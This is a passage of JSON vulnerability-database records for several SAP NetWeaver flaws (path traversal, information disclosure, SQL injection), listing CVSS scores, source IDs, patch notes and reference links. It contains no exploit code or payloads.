"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-12637",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-12637",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201708-277",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2017-12637",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2017-12637"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006983"
},
{
"db": "CNNVD",
"id": "CNNVD-201708-277"
},
{
"db": "NVD",
"id": "CVE-2017-12637"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Directory traversal vulnerability in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS in SAP NetWeaver Application Server Java 7.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657. Attacks on this vulnerability 2017 Year 8 Observed on the moon. Vendors have confirmed this vulnerability SAP Security Note 2486657 It is released as.Information may be obtained",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-12637"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006983"
},
{
"db": "VULMON",
"id": "CVE-2017-12637"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-12637",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006983",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201708-277",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2017-12637",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2017-12637"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006983"
},
{
"db": "CNNVD",
"id": "CNNVD-201708-277"
},
{
"db": "NVD",
"id": "CVE-2017-12637"
}
]
},
"id": "VAR-201708-0889",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2024-02-20T02:13:05.846000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "August 2017 (2486657)",
"trust": 0.8,
"url": "https://blogs.sap.com/2017/08/08/sap-security-patch-day-august-2017/"
},
{
"title": "Nuclei Templates\nResources",
"trust": 0.1,
"url": "https://github.com/merlinepedra25/nuclei-templates "
},
{
"title": "Nuclei Templates\nResources",
"trust": 0.1,
"url": "https://github.com/merlinepedra/nuclei-templates "
},
{
"title": "Kenzer Templates [1289]",
"trust": 0.1,
"url": "https://github.com/elsfa7-110/kenzer-templates "
},
{
"title": "Kenzer Templates [5170] [DEPRECATED]",
"trust": 0.1,
"url": "https://github.com/arpsyndicate/kenzer-templates "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2017-12637"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006983"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-006983"
},
{
"db": "NVD",
"id": "CVE-2017-12637"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.sh0w.top/index.php/archives/7/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-12637"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-12637"
},
{
"trust": 0.8,
"url": "https://www.onapsis.com/blog/sap-security-notes-august-2017-remote-code-injection-vulnerability-java-component"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/22.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/merlinepedra25/nuclei-templates"
},
{
"trust": 0.1,
"url": "https://github.com/arpsyndicate/kenzer-templates"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2017-12637"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006983"
},
{
"db": "CNNVD",
"id": "CNNVD-201708-277"
},
{
"db": "NVD",
"id": "CVE-2017-12637"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2017-12637"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006983"
},
{
"db": "CNNVD",
"id": "CNNVD-201708-277"
},
{
"db": "NVD",
"id": "CVE-2017-12637"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-08-07T00:00:00",
"db": "VULMON",
"id": "CVE-2017-12637"
},
{
"date": "2017-09-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-006983"
},
{
"date": "2017-08-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201708-277"
},
{
"date": "2017-08-07T20:29:01.120000",
"db": "NVD",
"id": "CVE-2017-12637"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-02-14T00:00:00",
"db": "VULMON",
"id": "CVE-2017-12637"
},
{
"date": "2017-09-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-006983"
},
{
"date": "2021-04-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201708-277"
},
{
"date": "2024-02-14T01:17:43.863000",
"db": "NVD",
"id": "CVE-2017-12637"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201708-277"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Application Server Java Path traversal vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-006983"
},
{
"db": "CNNVD",
"id": "CNNVD-201708-277"
}
],
"trust": 1.4
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "path traversal",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201708-277"
}
],
"trust": 0.6
}
}
var-201308-0079
Vulnerability from variot
The GetComputerSystem method in the HostControl service in SAP Netweaver 7.03 allows remote attackers to obtain sensitive information via a crafted SOAP request to TCP port 1128. SAP Netweaver is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may lead to further attacks. SAP Netweaver 7.03 and prior are vulnerable
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201308-0079",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 2.7,
"vendor": "sap",
"version": "7.03"
}
],
"sources": [
{
"db": "BID",
"id": "61402"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003761"
},
{
"db": "NVD",
"id": "CVE-2013-3319"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-546"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.03:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2013-3319"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Bruno Morisson",
"sources": [
{
"db": "BID",
"id": "61402"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-546"
}
],
"trust": 0.9
},
"cve": "CVE-2013-3319",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2013-3319",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2013-3319",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201307-546",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2013-3319",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2013-3319"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003761"
},
{
"db": "NVD",
"id": "CVE-2013-3319"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-546"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The GetComputerSystem method in the HostControl service in SAP Netweaver 7.03 allows remote attackers to obtain sensitive information via a crafted SOAP request to TCP port 1128. SAP Netweaver is prone to an information-disclosure vulnerability. \nAttackers can exploit this issue to obtain sensitive information that may lead to further attacks. \nSAP Netweaver 7.03 and prior are vulnerable",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-3319"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003761"
},
{
"db": "BID",
"id": "61402"
},
{
"db": "VULMON",
"id": "CVE-2013-3319"
}
],
"trust": 1.98
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-3319",
"trust": 2.8
},
{
"db": "SECUNIA",
"id": "54277",
"trust": 1.7
},
{
"db": "BID",
"id": "61402",
"trust": 1.0
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003761",
"trust": 0.8
},
{
"db": "XF",
"id": "85905",
"trust": 0.6
},
{
"db": "XF",
"id": "20133319",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201307-546",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2013-3319",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2013-3319"
},
{
"db": "BID",
"id": "61402"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003761"
},
{
"db": "NVD",
"id": "CVE-2013-3319"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-546"
}
]
},
"id": "VAR-201308-0079",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:09:30.264000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Note 1816536",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/khulnasoft-labs/awesome-security "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2013-3319"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003761"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-200",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-003761"
},
{
"db": "NVD",
"id": "CVE-2013-3319"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.8,
"url": "http://labs.integrity.pt/advisories/cve-2013-3319/"
},
{
"trust": 1.7,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"trust": 1.7,
"url": "https://service.sap.com/sap/support/notes/1816536"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/54277"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/85905"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3319"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-3319"
},
{
"trust": 0.7,
"url": "http://www.securityfocus.com/bid/61402"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/85905"
},
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/200.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.rapid7.com/db/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem"
},
{
"trust": 0.1,
"url": "https://github.com/khulnasoft-labs/awesome-security"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2013-3319"
},
{
"db": "BID",
"id": "61402"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003761"
},
{
"db": "NVD",
"id": "CVE-2013-3319"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-546"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2013-3319"
},
{
"db": "BID",
"id": "61402"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-003761"
},
{
"db": "NVD",
"id": "CVE-2013-3319"
},
{
"db": "CNNVD",
"id": "CNNVD-201307-546"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-08-16T00:00:00",
"db": "VULMON",
"id": "CVE-2013-3319"
},
{
"date": "2013-07-09T00:00:00",
"db": "BID",
"id": "61402"
},
{
"date": "2013-08-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-003761"
},
{
"date": "2013-08-16T17:55:05.050000",
"db": "NVD",
"id": "CVE-2013-3319"
},
{
"date": "2013-07-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201307-546"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-08-29T00:00:00",
"db": "VULMON",
"id": "CVE-2013-3319"
},
{
"date": "2013-07-09T00:00:00",
"db": "BID",
"id": "61402"
},
{
"date": "2013-08-19T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-003761"
},
{
"date": "2017-08-29T01:33:22.793000",
"db": "NVD",
"id": "CVE-2013-3319"
},
{
"date": "2013-08-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201307-546"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201307-546"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP Netweaver of HostControl Service of GetComputerSystem Vulnerabilities that can capture important information in methods",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-003761"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201307-546"
}
],
"trust": 0.6
}
}
var-201708-1674
Vulnerability from variot
SAP NetWeaver is prone to an unspecified SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201708-1674",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "100163"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "100163"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is prone to an unspecified SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.\nAn attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.",
"sources": [
{
"db": "BID",
"id": "100163"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "100163",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "100163"
}
]
},
"id": "VAR-201708-1674",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T02:08:03.848000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "https://help.sap.com/nw_platform"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/08/08/sap-security-patch-day-august-2017/"
}
],
"sources": [
{
"db": "BID",
"id": "100163"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "100163"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-08-08T00:00:00",
"db": "BID",
"id": "100163"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-08-08T00:00:00",
"db": "BID",
"id": "100163"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "100163"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Unspecified SQL Injection Vulnerability",
"sources": [
{
"db": "BID",
"id": "100163"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "100163"
}
],
"trust": 0.3
}
}
var-201701-1184
Vulnerability from variot
SAP NetWeaver Java is prone to an information disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks. SAP NetWeaver 7.5 is vulnerable.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201701-1184",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
